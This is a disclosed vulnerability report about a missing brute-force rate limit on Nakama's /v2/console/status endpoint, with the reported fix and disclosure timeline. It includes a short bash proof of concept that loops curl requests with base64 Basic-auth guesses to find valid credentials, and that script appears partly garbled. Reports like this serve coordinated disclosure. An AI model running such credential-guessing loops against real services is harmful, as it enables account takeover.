Login bruteforce in heroiclabs/nakama


Reported on

Aug 24th 2022


According to the fix of the previous report, the login page has a rate limit mechanism to block the user’s IP when many attempts are made. The endpoint, for example, /v2/console/status only returns the content when who made the request has the correct rights. However, this request is not being handled against brute-force attacks.

Proof of Concept

The attacker can use Authorization: Basic, represented by a base64 string containing <user>:<password>. So the attacker only needs to send <user>:<password> via the HTTP header Authorization, and check the HTTP response code (200).




request() {
  res=$(curl -i -s -k "http://$HOST:$PORT/v2/console/status" \
    -H "Authorization: Basic $token" | head -n1 | grep 200)

  if [[ $res != '' ]]; then
    echo ">>> Found: $(echo $token | base64 -d)"
    echo "Wrong: $(echo $token | base64 -d)"

# 1000 wrong tries
for i in {1..1000}; do
  request $(echo -n "user:password$i" | base64)

request $(echo -n "$USER:$PASSWORD" | base64)


Login bruteforce attacks.

We are processing your report and will contact the heroiclabs/nakama team within 24 hours. 7 months ago
We have contacted a member of the heroiclabs/nakama team and are waiting to hear back 7 months ago
heroiclabs/nakama maintainer has acknowledged this report 7 months ago
Renan Rocha
6 months ago



Andrei Mihu validated this vulnerability 2 months ago
Renan Rocha has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Andrei Mihu marked this as fixed in 3.16.0 with commit d1e894 2 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
This vulnerability is scheduled to go public on Feb 1st 2023
api.go#L299-L421 has been validated
Andrei Mihu published this vulnerability 2 months ago
to join this conversation